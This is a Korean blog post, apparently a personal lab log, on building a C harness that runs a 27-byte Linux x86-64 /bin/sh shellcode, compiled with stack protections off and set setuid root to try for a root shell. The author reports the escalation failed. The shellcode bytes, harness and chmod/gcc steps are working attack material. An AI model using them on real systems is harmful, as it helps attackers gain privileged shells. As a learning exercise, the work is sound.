[시스템 해킹] 쉘 코드 제작 및 익스플로잇 실습

참고 : https://youtu.be/eJWlg-VoCBg

유튜브를 보면서, 쉘 코드를 제작하고, 익스플로잇을 실습해보려고 한다.

쉘 코드 및 익스플로잇이란 용어는 보안기사 준비시 많이 들어봤다.

---

쉘 코드는 명령 쉘 공격 코드를 이용해 취약점을 뚫고 서버 컴퓨터를 제어할 수 있도록 하는 코드를 뜻한다.

 

윈도우에서 쉘 코드는 우리가 흔히 쓰는 cmd를 뜻한다.

---

 

구글에 자신의 운영체제를 적고 쉘 코드를 검색하면 다양한 쉘 코드들이 검색된다.

https://shell-storm.org/shellcode/files/shellcode-806.html

Linux/x86-64 - Execute /bin/sh - 27 bytes

현재는 이 쉘 코드를 사용하려고 한다.

$su root

root권한 탈취를 위해 root 계정으로 접속해 shell 코드를 작성하고자 한다.

 

#nano shell.c

먼저 shell.c를 만든다.

쉘 코드를 포함하는 문자열을 하나 만든다.

그 후 그 안에 위의 쉘 코드 중 char code[]=" ~~" 안의 부분을 복사하여 붙여넣기 해준다.

Ctrl+Shift+V 또는 마우스 우클릭의 클립보드 붙여넣기를 통해 해당 코드를 붙여넣기 할 수 있다.

#include <stdio.h>
#include <string.h>

void main(){
	const char shell[]="\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05";
        printf("length: %d bytes \n", strlen(shell));
        (*(void(*)()) shell)();
        return 0;
}

처음은 쉘 코드의 길이를 출력하는 printf문이고, 그 밑은

함수형태로 실행해서 바로 쉘 코드를 실행할 수 있도록 만들었다.

 

엄청난 서치 결과 현재 char 선언을 main안에 해야하고 const를 붙여야 작동한다는 것을 알아냈다.

 

# gcc -fno-stack-protector -mpreferred-stack-boundary=4 -z execstack shell.c -o shell

칼리 리눅스와 같은 최신 OS는 기본적으로 프로그램 컴파일시 스택 프로텍터가 있지만,

실습을 위해 방어기법을 모두 끈 상태에서 실습을 한다.

---

실습을 위해 새로운 사용자를 추가하도록 한다.

#adduser test

adduser 명령어를 이용해test 유저를 추가하자.

 

#chmod 4755 shell

shell 코드의 실행 권한을 setuid를 설정한 4755로 설정하도록 한다.

setuid는 root의 권한으로 해당 프로그램을 실행한다.

 

#chmod 0775 홈 디렉터리

test 유저를 새로 만들었는데  자꾸 밑에서 실행이안돼서 엄청 찾아보다가

해결방법을 알았다.

 

#su test

test 사용자로 이동하도록 한다. 

su 명령어는 사용자를 변경하는 명령어이다.

$./shell

이번에 사용한 쉘 코드로는 루트 권한 탈취가 어려운것 같다.

stack overflow를 찾아보니, 쉘 코드를 수정하거나 해야된다고 한다.

 

다음엔 다른 쉘 코드를 이용하여 만들어보아야겠다.

 

 

2023.01.19 - [프로젝트/시스템 해킹] - [시스템 해킹] 어셈블리어로 별 피라미드 만들기 (2)

[시스템 해킹] 어셈블리어로 별 피라미드 만들기 (2)